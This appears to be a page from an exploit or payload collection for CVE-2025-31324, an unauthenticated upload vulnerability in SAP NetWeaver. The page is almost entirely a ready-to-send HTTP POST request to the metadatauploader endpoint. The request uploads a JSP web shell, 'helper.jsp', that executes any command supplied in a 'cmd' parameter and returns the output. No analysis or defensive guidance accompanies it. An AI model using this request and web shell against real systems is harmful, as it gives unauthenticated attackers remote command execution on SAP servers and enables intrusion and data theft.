SAP

CVE-2025-31324

LogoReliaQuest Uncovers New Critical Vulnerability in SAP NetWeaverReliaQuest

SAP NetWeaver Unauthenticated - Upload vulnerability

POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive
Content-Length: 636
Content-Type: multipart/form-data; boundary=816121b0328c3864dc7963b2e0275e90

--816121b0328c3864dc7963b2e0275e90
Content-Disposition: form-data; name="file"; filename="helper.jsp"
Content-Type: application/octet-stream

<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
    String cmd = request.getParameter("cmd");
    Process p = Runtime.getRuntime().exec(cmd);
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>

--816121b0328c3864dc7963b2e0275e90--
PreviousSalesforceNextScriptcase

Last updated